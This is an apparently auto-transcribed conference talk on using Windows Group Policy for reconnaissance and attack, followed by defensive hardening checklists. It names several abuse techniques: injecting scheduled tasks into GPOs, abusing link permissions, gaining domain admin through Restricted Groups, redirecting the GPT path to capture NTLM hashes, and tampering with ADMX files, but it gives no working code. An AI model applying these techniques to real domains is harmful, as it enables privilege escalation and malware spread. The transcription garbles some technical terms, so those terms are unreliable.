G1234! - Exploiting Windows Group Policy for Reconnaissance and Attack - Darren Mar-Elia

this talk is exploiting windows group policy for reconnaissance an attack by Darren mark Illya we have a few announcements before we begin we'd like to thank our sponsors for critical of critical stack and ball mail and our stellar sponsors Robin Hood secure code warrior and paranoid is their support along with our other sponsors and donors and volunteers that make this event possible we do ask that you please these talks are being streamed live so as a courtesy to our speakers and the audience we ask that you check to make sure your cell phones are set to silent if you have any questions we will use the audience mic after the talk so that youtubers can hear the questions

and the answers so after just please raise your hand and I'll bring the mic to you thank you how's everyone doing Paul I really appreciate the turnout for such a topic as Group Policy I've been speaking for about 20 years mostly at IT conferences but this is my first time at B sides so I'm super happy to be here how many of you are reasonably familiar with group policy awesome so I won't spend a ton of time talking about kind of the guts of group policy although I think it's worthwhile to kind of review it just to make sure we're all on the same page I guess questions are at the end so if you do have questions as I'm talking try

to remember them write them down or something and I'll make make sure I leave time for questions afterwards a little bit about me my day job is head of product at a company called semper as' we do Active Directory protection and disaster recovery I founded a website that many of you may have visited in your travels called GPO guy.com back in like 2004 and a company called SDM software that sort of created commercial group policy still does create commercial group policy software I was a 14 time Microsoft group policy MVP until Microsoft Samara Lee executed all group policy MVPs last year so the reign of Group Policy MVPs has come to an end there wasn't enough cloudiness in group

policy for Microsoft's tastes so they got rid of a whole swath of group of MVPs including myself spent a bunch of years of my career probably half of my career and kind of enterprise IT for financial services and software companies I have a group policy training course out on Pluralsight I've got some projects out on github as the pictures sort of indicate I have two in congruous hobbies of bike racing and making wine that I try not to mix but that's what I do for fun for the most part and let's see if I could make a PowerPoint do what I want so just a little bit of a what we're going to talk about just a little

bit of a review on what group policy is does how it works some of the reconnaissance benefits of group policy benefits in quote attacking group policy what are some of the things that attackers can do with group policy and then a little bit on defending against that so what is group policy built-in configuration management technology for Windows and Active Directory a roadmap to an organization's security posture windows security posture a malware delivery vehicle or all of the above can anyone guess which answer is correct right actually just kind of interestingly the last time I was at b-sides here was in 2016 so at that time I had been 16 17 years working with Active Directory and group policy blissfully

ignorant as to the threats against both Active Directory and group policy and I sat in a room just like this and listened to a talk about bloodhounds how many of you are familiar with blood heme yeah it's it's an amazing tool and my eyes were opened and I started to think about how group policy would benefit or not benefit from the same kinds of approaches that the guys were doing with bloodhound and actually after the original release of bloodhound they released kind of a GPO release that had a bunch of discovery in it which I'll talk about in a little bit but it sort of got me thinking about this whole notion of group policy from a security

angle and that that was kind of my my path to where I got to today where I'm talking about group policy and security I have a like a mailing list that's got something like 17,000 people on it and I every one every couple years or so I do a survey to try to understand what people are doing with group policy how it's changing is everyone mass migrating to in tune because it's so awesome stuff like that and one of the things I asked is how are you using group policy and this is useful to sort of understand what the let's say the attack surface looks like in most organizations group policy is used for 80 80 plus percent

for general administrative templates lockdown security hardening and general kind of registry tweaks just under 80 percent and then you know other parts of group policy come in here driving printer mapping is pretty high folder redirection browser configuration all of this stuff is you know plus 50 percent in most organizations so it's worthwhile to know that if you're in a if you're in a position of using group policy to secure your environment this talk is very relevant to you and it's also very relevant to an attacker that's looking to exploit group policy to worm their way into your environment so just about the structure of GPOs because I think it's important when we're thinking about abusing group policy there's a lot of

words on this page but basically there's two sides to a group policy object this is the way Microsoft architected it from the beginning for better for worse there's a piece in AD that's called the GPC it's in the CM equals policies CN equals system container you'll see a bunch of grid named containers Lincoln's kind of see it on that screenshot each one of those grid named containers represents one GPO and on that grid named container are a set of attributes that talk about the friendly name of the GPO the path to the other side of the GPO the version number of the GPO information that we'll talk about a little bit more that's relevant to how group policy functions as I

implied the other side of the group policy object is called the group policy template or GPT that's insists ball now this was a huge problem in the early days of Windows 2000 and Windows 2003 because Microsoft had this really wonky mechanism called FRS that would replicate sysvol to every domain controller sometimes and so you'd have this situation where you'd make a change to a GPO and the ad side would be changed but the system all side wouldn't replicate so the clients would think that something has changed in the GPO but didn't really get the new settings and it was it was a cause of a lot of consternation that now have effet FS our FRS that allows that is more robust and

allows sysvol to be more consistent across all the dcs now you still have some latency and some difference in replication between the ad part of the of the GPO that I say FRS I've met DFS R the ad part of the GPO and the sysvol part of the GPO they're not gonna replicate identically at the same time but such as life it's a best-effort sort of scenario in that case but the point is you have these two pieces of the GPO that are supposed to be synchronized from the perspective of permissions and content so if you edit a GPO by default when you edit a GPO it's targeting the PDC emulator domain controller in your

domain when that happens the change is made to the ad side the change is made to the system all side and then a triplet gates out from there that's the way it's supposed to work the other thing to know about the GPT this is where most of the settings storage occurs so when you're defining an admin template setting or a GP preferences Drive mapping or a security hardening setting it's getting written to files in sysvol now there's a few exceptions to that one is software installation software installation is a part of group policy not terribly used anymore where you can deploy msi files that particular area writes a piece to ad and a piece desist ball so it's kind

of split between the two okay so why am I talking about this so the the point about it is and we'll get into it in a little bit both sides of the GPO have to you you have to pay attention to both sides from an attack perspective because attackers can take advantage of inconsistencies on either side mostly in delegation to put stuff into Group Policy objects that shouldn't be there so when we talk about processing of group policy it is strictly a client-side operation meaning that if it's Windows Server Windows desktop Windows workstation it is doing the work of pulling down the group policy so when it does that it does it in two phases

the first phase is basically tell me all the GPOs that apply to me that's called core the core face gets done and it queries ad uses LDAP determines which GPO is apply to it it's got its list and it says ok I know which GPO is apply I know which policy areas are in each of those GPO so then I'm going to call the client side extensions or CSE's to bring each two basically by policy area bring down the settings storage for each GPO and process it do whatever it says Drive map a drive make a registry setting change a security configuration Sam whatever it happens to be the CSE is responsible for actually processing the

policy that's a dll sits in wind and system32 Microsoft ships a bunch of CSCS out of the box a little-known fact this is a this is an extensible framework it was meant to be an extensible framework from the very beginning there are third-party vendors that have extended group policy essentially what that means is writing a new CSE and writing a new MMC snap-in to the GP editor to be able to set those settings but you can do it a little C++ knowledge and the ability to register the CSE in the registry you need to be at admin to be able to register a new CSE but if you are an admin you can register that CSE and you can provide

new policy functionality so I went through that settings are per computer or per user but in either case as of MMMs 1607 to I think when per user policy processing runs it runs in the context of the Machine account local system and then it will impersonate the user to make the user specific changes the reason they made that change was for I don't recall the exact scenario now but there was some man-in-the-middle account attacks on group policy processing that we're taking advantage of the fact that GP processing for the user was running in the user context so they moved GP processing for the user into the user context they broke a whole bunch of IT shops in one fell swoop

because when you rolled out this MS 1607 to all of all of the GPOs that you had filtered by security user security groups didn't work anymore because you had to grant the computer access to that GPO in addition to the security to the user group more detail than isn't useful at this point but just wanted to set that context GPOs get refreshed on clients and member servers every 90 minutes by default plus a 30 minute randomizer so could be 90 could be 120 or anywhere in between now why this is important and it's five minutes on domain controllers why this is important is that if somebody flexes with the GPO thinking that it's gonna have an immediate effect it doesn't in a

large enough organization was significant with sufficient randomization you probably have machines that are refreshing group policy all the time but the point here is that it's not going to be instantaneous across the organization when you make a change to a GPO so targeting so you have a GPO you create a GPO and AD it does nothing until you link it to something you link it to a site an ad site which is just a collection of IP subnet definitions in AD you link it to a domain to the domain at the domain NC head which is the top level of AD or you link it to an oh you or organizational unit once that's done all of the things

being equal you will start applying that GPO to computers and users in AD and there's an order of precedence to that on Windows on every Windows SKU server or workstation there's a local GPO there's actually something called multiple local GPs that they introduced in vista which is probably an area for exploit but I haven't really dug into it too much but the point is that there is this concept of the local GPO that you can edit just on that machine to set its policy it will be overridden by any site link GPIOs if there's if there's conflict by any domain link GPIOs and then by Ennio you lake GPOs so you have this order of

inheritance with group policy site a local site domain oh you where you could have ten different policies applying to a given computer account and if there's conflicts along the way the last writer wins meaning the oh you linked one's wind now there are two things you can do to disrupt that you can set a link higher up let's say at the site level to enforced that will always win over a conflicting settings set at the öyou level you can at the öyou level you can block inheritance block inheritance says everything above me in the order of precedence ignore it enforced the enforced link wins out over block inheritance so enforced wins in every situation that's useful to know both of

the attacker as is in defender because if you're an attacker and you're able to write GPO links what are you gonna do with that link you're gonna make it enforced because it will beat out everything that somebody tries to do to circumvent you down below and then there's also on a given oh you you can have 10 15 20 G POS linked there's an order of precedence in those as you're looking in the tooling and I'll show you this in a little bit so you've got linking but maybe you want to get more granular about who in the oh you you want that policy to apply to you have a number of different filtering criteria

you have security groups that you can use you can say on the GPO only apply this to members of the marketing users group in the marketing oh you you have WMI filters that you can attach to a GPO you have one WMI filter per GPO the WMI filter is a w my query that gets executed by the client if it's true the GPO applies if it's false it doesn't the W my query is used for things like only apply this to Windows 7 machines or Windows 10 machines and then you have GP preferences which is a section of Group Policy and I'll show this so it kind of becomes real in each of the GP

preferences areas you have something called item-level targeting where you can have two filtering on a per setting basis if it's any wonder why people hate group policy this slide captures it beautifully it is super complex and that complexity is both a blessing and a curse because it gives you a lot of flexibility but it gives attackers lots of surface area to go mess around

this last point is important group policy is normally only updated on the client if something in AD has changed in other words if the GPO is updated it gets a new version number the client wakes up for its group policy processing cycle and says the last version I processed is - what is the version on the GPO it looks an ad for the version it ignores sysvol which there's a version there but it doesn't get updated anymore it's only looking at ad if it says - on ad it doesn't process the GPO that time around it just ignores it so if somebody has tinkered with the GPO but hasn't messed with the version number it's not

gonna pick up that tinkering that's important now there are ways to circumvent that on a per CSC basis but for all all other things being equal you can if the version numbers are the same on client and ad the GPO is ignored during that cycle let me before I move on I want to just talk a little bit or a show a little bit of this stuff so that it's not so abstract I mean I'm sure most of you have messed around with this so I'm not telling you anything that you don't know but here's my domain test me net I have one GPO linked at the domain level I have all these nifty OU's

you can see the GPO s that are linked at the client so you for example I have three of them there the one at the top of the list gets processed blasts so it wins if it's conflicting with any of its other ones if there's conflicts between the default domain policy and any of these then these guys win because they're lower in the pecking order last rider wins if I come down to the ad site I have actually no GPOs linked at the ad site but if I had a GPO linked here it would be processed first or after the local GPO on that particular client and so it would if there was conflicts between it and the domain or the oh you

the site linked one would lose now if I dig into a particular GPO I've got the computer side in the user side pretty straightforward we have policies and preferences when I was talking about item level targeting on preferences if I create a preference let's just do something kind of simple I'm gonna say C colon oops I'll just do just enough to get me into this you can see what items level targeting looks like on that particular setting I now have 27 different possible types of targeting I can do in ANDed and Ord combinations if I choose to do so to further filter that GPO so lots of opportunity here for confusion so that's kind of a review of

what I just talked about let me just quickly so you can kind of see what I'm talking about here's the GPC right this is the ad part the do group policy container part each one of these grid folders represents a GPO if I come into the properties of that look at the attribute editor you will see the display name of the GPO you'll see the grid of the GPO the distinguished name you will see if I come all the way down to the end the version number that is the version number of the GPO that the client looks at when it's trying to determine if anything has changed and I'll refer to this in a little bit

there's also these two attributes called just GPC and GPC machine extension names and GPC user extension names these hold the grids of the policy areas implemented in this GPO this is super important when comes time to talking about tinkering with your policy setting storage these grids have to exist for the corresponding policy areas that are in the GPO or the client will simply ignore it and not only that they have to be that they have to exist in this in the GPC they have to be sorted alpha numerically so I've had some people kind of talk to me about you know injecting settings into group policy objects and they're able to do it but they can't

figure out why it's not working on the client this tends to be the reason why the grids not the grid it's actually a pair of grids are not there for that particular policy area and they're not sorted maybe they're there I discovered this early on maybe they're there but if they're not sorted they're also ignored by the pond by the client so there's a very precise kind of way of messing with group policy that you sort of have to be aware of as an attacker or even as a defender frankly okay let me get back into this deck so why is GP useful for reconnaissance well as I indicated in that little survey that I showed many IT

shops are using it for security hardening a lot of the baselines that you get from the standards bodies or from Microsoft they come in the form of group policy object backups they're there they're basically telling you use group policy for this of course Microsoft has some other technology like SCCM that they offer for this but most chops it's free it's in the box it's generally well understood they use group policy to do security hardening and they're doing it for not necessarily an order of importance but certainly close local group membership like setting local administrators configuring user rights so who can do debug programs who can do log on locally or log on access this computer from the network who has

remote desktop access to the to the computer as their user rights control all that stuff security options like whether UNC is sorry UAC user account control is enabled or not all that's set in group policy if you're using how many of you are doing admin tearing with you know Microsoft talks about tier zero tier 1 tier 2 right of those of you who are doing admins hearing how many of you are implementing admin tearing enforcement through group policy yep so roughly the same amount so the ability to control who can log on to the main controllers who can log on to servers and workstations that's all implemented in Group Policy password policy how many characters

should the password be how long should it last should it lock out and then configuring local admin passwords used to be a feature in Group Policy preferences how many of you used Group Policy preferences to configure local admin passwords surprisingly few that's good I've heard that this is still a problem when pen testers go into a Windows environment they're finding these things littered all over the place why is it a problem well because as part of Microsoft's protocol Docs they published the encryption key for for the policy storage in the dock so and it uses the same encryption key for every single implementation so you can decrypt all of the passwords there in group policy storage and as I mentioned at the

the last point here which is like the most important point for group policy as a reconnaissance tool GPOs are world readable by default every authenticated user in the domain gets read access when a GPO gets created to your security hardening to your drive mapping you know the most trivial stuff and the most important stuff is world readable if I'm on ad if I'm authenticated to AD which we now you know this day and age it's not that tough to get a foothold in an environment even as a non privileged user and as a non privileged user I can run bloodhound for example and get a map of who's in which admin who's in admin groups on which machines or other tools

will let me read the password out of GP preferences so that I can log on to a machine as admin so this this world readable thing is a blessing and a curse as well so I wanted to kind of highlight some tools that are useful for reconnaissance of group policy power view it's a part of power sploit it's got a bunch of commandlets powershell commandlets in there for enumerated admin access on machines by user the new GPO immediate task is actually a kind of a working sample of being able to inject settings in this case for a scheduled task into a GP preference on an existing GPO it assumes you have access of course but

the point is with this command lit you can do that char pound which is the ingest err the data collector for bloodhound collects a lot of the same information you-know-who's if you set it to run in that mode using group policy without hitting the DC I can figure out whose local admin on a machine or without hitting the machine itself I think it's part of the so called stealth mode to use group policy to determine who's an admin on which machines in the environment and then group or two is my new favorite plaything this is written by at Los he's out in Perth in Australia and it is super cool if you haven't downloaded and tried group or two it is

a great tool I'll show you it in a minute but it's basically what he's done is he's gone through and sort of come up with a list of things that represent a potential problem in group policy from a security perspective everything from permissions on GPOs to local admins being added to GPOs - you know GP preferences passwords being found in GPOs and if you run group or two against your ad environment it'll enumerate all of these give it a risk score or I think he calls it an interest level and let you sort of assess in one fell swoop all of the potential issues that you have to be worried about from a group policy

perspective so let me kind of I want to just drop in and show some of this stuff all right so so I've got one just up on the screen here this is a Power View command lit called find group policy GPO computer admin I pass it a computer name and the domain name and it tells me what policies are granting which users admin access or remote desktop access on this on these on this machine than at this wind Tim client so it's called out this group called tier two admins which is a member of local administrators you can see here it's it's a group in this GPO and it's using the GP preferences local users and

groups feature to grant that access this one is domain users being granted remote desktop users access in this GPO using restricted groups policy so it's really great it kind of calling out for a given machine or I can flip it around and ask for a particular user where does this user have admin access now this is a fairly simple environment but you can imagine if you're an attacker trying to get access to this information running it across an entire environment you're going to get a lot of good information now the common thread for all of these tools is you don't require that the the person running the tool doesn't require gpmc that's been kind of a stumbling

block for most I don't know if I'd call it a stumbling block but it's it was a hurdle for any tools that are trying to assess through policy because if you're not using gpmc you have to sort of write it all from scratch all of these tools have taken that on you don't need gpmc running and it doesn't use any of the gpmc libraries that's super handy because you can drop these tools on any machine and execute them effectively against a group policy environment let me shift gears and just show you how a group or two works it's pretty straightforward I'm just gonna run it as is and I'm gonna run it in pretty mode

quote-unquote and it's going out and munching through your group policies and then it starts basically showing all of the as I mentioned before all of the kind of different parameters of things that it's looking for and then the interest level so NT services there's some immediate tasks in here I won't go through the whole thing because it's a little bit hard to read on the screen like this but essentially what it's doing is looking for anything that's interesting from a security perspective and dumping it out to this report and that includes I'll talk about this in a little bit but it includes permissions on GPOs linking settings that might be interesting like security settings local

group membership all that okay

so let's talk about attacking attacking group policy now actually before I do that I meant to show you one other thing that I'm getting ready to the next couple of months so so I built this group policy SDK many years ago for reading and writing GPO settings one of the challenges that tools like group or to have or any of these tools are that if you're trying to determine settings in a group policy object that exists there is no API for that especially without gpmc there's not you can't run a settings report like you can in gpmc it's just reading the raw storage files and and then trying to parse them to make sense of them and that's super time

consuming I went through that ordeal many years ago to write this SDK and I'm planning I've been working on decoupling the read part of the SDK there's a there's a getter part and a setter part where you can actually write settings to group policy objects it also doesn't use gpmc so the reader part i'm decoupling and making available in github on my github account as soon as I can get the code cleaned up and all the swear words against Microsoft taken out but I wanted to just kind of show you a little bit about how it works the first line here if you can see this gets a reference to a particular GPO the second line gets a

reference to a setting path and you can see here that you're allowed to or you can use this by just referring to the English language setting path as it appears in GP editor that's kind of the powerful part about it you don't have to parse XML or parse some weird INF file you can just refer to the setting path you can find out the if it's defined or not for a given setting and this this particular line is just looking for who has debug programs who has been granted debug programs debug programs user rights in this GPO right and then if I find one that's set to 1 in other words it's defined then I want to see what the value of

that is so if I come down here let me just well I'll just I'm just gonna paste it into PowerShell cuz it's easier and if I just run it you'll see here that it's returned the group that's been granted debug programs right in that GPO in that setting path so super easy way of querying GPOs without gpmc programmatically from the command-line it's you can use it as a the the underlying code is a you can use in C sharp or PowerShell it doesn't really matter so keep an eye out if you're interested in that keep an eye out on my github page that I mentioned earlier hopefully that'll be dropping soon alright attack paths so weak write permissions

on the G PC or GPT for one or more GPOs so what's the opportunity here writing new settings into a group policy object to execute arbitrary code so think about all the things that group policy can do it's like a smorgasbord of execution right there's schedule tasks there's log on in startup scripts there's software installation there's shortcuts all these things are stuff that gets sent to the client where the client clicks on something or does something and it executes a code somewhere and that instruction of where to execute that code is stored in the GPO right if it's a shortcut it's a path to a file that path can be manipulated changed added whatever if you have write access to the

GPO you can make arbitrary changes to it so scheduled tasks is a good example because new GPO immediate tasks from Power View I've actually seen this used in the wild in malware to essentially once the attacker got into the environment they used this or something like it to immediate tasks in a GPO that executed on all the machines and what did the immediate tasks do it installed the malware on every machine that processed the GPO and and you you know you can multiply that the only limiter to that today is the complexity of writing to setting storage because if you'll recall I said that GP the GPT where settings are stored every policy area has it not

every but almost every policy area has a different storage format for expressing settings so if I'm doing user rights assignments or security options it's in a file called GPT Temple INF if I'm doing GP preferences shortcuts it's in an XML file if I'm doing GP preferences scheduled tasks it's in a different XML file with a different schema and a different set of attributes every single one I mean Microsoft did us a favor here it's really hard to you know write an SDK a unified SDK to write settings into a GPO programmatically it's hard and I can't tell you the pain and suffering that I went through to do it over a number of years and I'm still working on

it but it's it's not an easy task but if you have a very defined target like scheduled tasks like logon or startup scripts like security hardening settings then the task is a lot easier if you're just going after a few of those setting areas so what are the challenges to doing this you you'll remember I talked about those GP C extension grids that have to be in a GPO for each policy area that's implemented in that GPO so here's here's an example I have I'm an attacker I'm in the environment I'm running new GPO immediate task and I poke an XML file with the task into a GPO that doesn't have scheduled tasks defined in

it well unless I'm also poking into the ad part of that GPO the grids for scheduled tasks the clients are just going to ignore it they don't care so it's an attacker I have to find a GPO that already has scheduled tasks added to it and add my arbitrary execution code into that GPO storage does that make sense so the the the process of doing this is a I need write permissions on the GPT I don't even need to touch the GPC if I'm an attacker all I care about is that the GPT has gives me write permissions I've got write permissions I'm trying to write a schedule task I need to find GPOs that are linked to you know targets

that I care about in other words you want to find a GPO that's linked to as many clients or users as possible right so you probably want to find one linked at the domain level GPO is linked at the domain level are processed by every computer and every user by default in the domain so I want to find a good target GPO that has scheduled tasks implemented in it already and then I can push my XML into that GPT great but that's a challenge right it reduces the opportunity so for new policy areas if I want to be able to write a new policy area I have to have permissions to write to the GPC the ad part of it I need to

be able to add those extension grids to the GPC and again as I mentioned if you're only modifying the GPT if I'm only writing that scheduled tasks to the GPT part of the GPO and I'm not touching the version number an ad then the clients it may be a while before the clients know about that they may not pick it up so if I'm an impatient attacker it might not get me where I need to be now you can touch the version number on the GPC if you have write permissions on it and increment it say by one and then the client will say up something's changed pick it up let's go so weak right permissions on containers

so this is the ability to link and unlink arbitrary GPOs to target users and computers so let's say I have a GPO that I created because I was able to get privileged access on a user account that had the ability to create GPOs so I created a malicious GPO it doesn't do anything just sitting there I have to link it to something the next thing I want is write permissions on container objects Oh use domain sites so that I can link my malicious GPO to as many targets as possible so that's the the piece that you know kind of if I have both creation editing rights on a GPO and I can link to it to one or more

containers all bets are off I can do whatever I want including if I can link that GPO to a domain controller so you or the domain there's a neat little knot we're very well-documented feature in restricted groups policy remember I was using restricted groups policy to grant admin access on my machines you could target domain groups with restricted groups policy Microsoft doesn't recommend it I don't recommend it but let's say I have I've gotten into the environment I've created a group or a user account I can create a restricted groups policy that says put that user account or group into local administrators and I linked that to the default domain controllers or the defects Cuse me the domain controllers

oh you or even the domain and what happens when the domain controller processes it it says oh I need to add this user a group to administrators well the only administrators I know about is the one in AD so it puts that user in group or group into the administrators group excuse me in ad and your now you've gone from just a lowly regular person to a domain administrator okay pretty much talked about what you can do with linking and unlinking you know it works well it works the same way for unlinking if I can unlink hardening then I can weaken the security posture of the organization so it's just as bad to be able to change links on to unlink

as it is to create links I want to just gonna drop out of here for a second to just show what I'm talking about with links apologize I got a little tickle in my throat so if I'm on and oh you let's say I'm on this client so you if I look at the properties of the oh you itself you'll see that marketing admins has been added to the delegation of this oh you and I think this is the one that I mucked with if I come down here to the permissions on marketing admins and go down to the permissions on the property what you'll notice is I have right GP options and on the other ace right next

to it I have right GP link that is the permission I need to be able to link an unlink a GPO on that oh you so if any user or computer or group or whatever has the ability to write to GP link I can link a GPO to that oh you okay all right so what are the challenges well you need to find existing GPOs that suit your purposes let's say you have link permissions but you don't have permissions to edit GPOs that's okay you can use tools like Power View to find interesting GPOs that grant admin access or do something you know from a settings perspective that is advantageous to your position and then you can use those

existing GPOs to link to containers where maybe you have a user account that you've already compromised external paths this is one I just wrote up in the past four or five months so you have GPOs and the permissions on the GPOs that may not grant write access but in the GPO you're referencing external storage locations like logon scripts that point to a server share somewhere or shortcuts that point to a server share somewhere printers files where you're copying files from one location to another all of these can contain external references paths to servers that are not in sis fall so even if you're a your GPOs are completely locked down and you can't you know attacker can't write to

them easily if they can get to the server where you have the logon script stored and they have write access to that it doesn't matter they've just essentially put whatever script they wanted in place of the script that the GPO is a referencing and they can do whatever they want in that script so you have to think about hardening not only the GPO but any external paths that it calls and group or to looks for that in GPOs that you have I mean a part of this is about discovery in a in a reasonable size organization you might have hundreds of GPOs I had one customer that had 10,000 GPOs not fun so imagine having to go

through that and find out all these nooks and crannies now the challenge of course in this is you still have to have a as to those external servers that are being referenced by the GPO s okay I'm gonna try to zoom through because I know we're running out of time GPT redirection let's say I have write permissions on the GPC the ad side of the GPO when I talked when I showed the ad side of the GPO I brought up the attribute editor let me just and there's an attribute in the attribute editor called GPC file suspend the GPT the sysvol folder guess what I can change this to any UNC path and that's what

this particular attack is all about if I can make that change I can redirect it to some server some SMB share somewhere with a copy of the GPO settings with some alterations that I made for my benefit and so when the client processes group policy they will pull this down from this external share happily without thinking about it now when I first published this a guy in Germany tagged null de did some work on it and and found that using this technique he stood up an impact SMB server to be the external share and watched the the hashes rein in as clients and users were accessing Group Policy ntlm hashes so it you know it wasn't like Universal

because there were certain circumstances where you were only getting the computer hashes but that could be valuable as well so the point is you know there's other things that you can do with this besides just you know faking setting storage so it's really important to be able to control who can write to that GPC in this scenario now doing this the downside to this is if you're if you're an attacker doing this and the admin tries to go in and edit the gpo that you've redirected or report against it it will just barf all over the place Microsoft doesn't know what to do with it so that's a pretty telltale sign that something's wrong this this next one I just wrote about

this it's a little bit of it's kind of out there but I thought it was worth documenting so admin template settings use something called admx files admx files define the text that you see in the GP editor under admin templates and behind the scenes what registry keys and values they write to most shops have something called a central store the central store is just a folder in sysvol where all where you keep all of your admx files and everyone using gpmc and GP editor in the domain will use that copy of admx files it's a centralized version control system if you will for admx because admx files change with every new release of Windows at

Microsoft comes out with so that's kind of the authoritative source if I have write access to the central store I can go into it go into an admin admx file and change the underlying registry key and value for a particular policy now that in and of itself is not terribly interesting because in order for that to take effect an admin would have to come in and set that value after I made that change so the chances of that are small of course I I had recommended it if you were gonna try to do this as an attacker that you pick a setting that many shops implement and I did that here in an example that I have where I took this

setting here always wait for the network at computer startup and logon which I don't know there's it's got a period one of the most common settings I've seen in Group Policy land and I took the set the snippet of a DMX file that implements that so it tells it what registry key and value - right - and I modified it and I said well actually if they if they enable that setting what I really want you to do is disable UAC and the text description in GP editor doesn't change because that's coming from a different file that's not that's the language independent file called the 80ml file but if they hit this and say enabled I

said okay set enable Lua which is the UAC registry key for enabling UAC set it to zero turn it off so suddenly UAC gets turned off on that Jeep and any problem any clients that process that GPO so again there's some caveats in terms of leveraging this because you have to wait for the admin you really have to be patient you have to wait for the admin to edit and create a you know use this setting in a GPO but nonetheless it's completely hidden you'll never find as an admin you probably won't find it until it's too late and there are other things you can do with this as well I picked an obvious one weak write permissions on starter

GPOs this one this one was kind of a low-hanging fruit thing I don't know very many shops that use starter GPOs there were this kind of aborted idea that Microsoft had around creating GPO templates they never really took it very far today it exists - essentially you can use it to create a template of admin template settings and then you can create a new GPO from it well just like there's issues with weak write permissions on regular GPOs starter GPOs have the same problem if I can write to a starter GPO and write some arbitrary setting in there that may be weakened security in the environment like I can write Windows Firewall settings into registry Paul then if somebody creates a

new GPO from that starter GPO then all bets are off all right I want to talk a little bit about defense before I run out of time so as it may be obvious to you there's probably a couple different things that you can do from a reconnaissance perspective this first ones a little tongue-in-cheek but it's actually not a bad way to go if you're using group policy today for security hardening stomp use something else there's other technologies out there for pushing security configuration to Windows the second one is more measured I would say which is to reduce the visibility of GPOs responsible for security so don't give the attacker a road map to your security posture if you

have GPOs that implements security hardening standards take away authenticated users read from the security filtering on that GPO at the very least targeted to domain computers what does that do it means that users because authenticated users remember includes both computer accounts and user accounts if you're not using authenticated users you're just using domain computers then only computer accounts can read the policy and admins of course but a regular user cannot I have to stop let me just talk quickly about hardening checklist check who can write to GPOs who can write GPO links who can write to the central store are the G PC and GPT permissions consistent do parent folders and containers in those to grant child rights that are

disparate or separate from your GPO delegation I've seen that happen a lot of times an external path permissions should match the reference GPOs sorry for that last-minute flurry but hopefully that was useful thank you I don't know I guess we don't have any time for questions or any if you have any questions thank you very much Darren you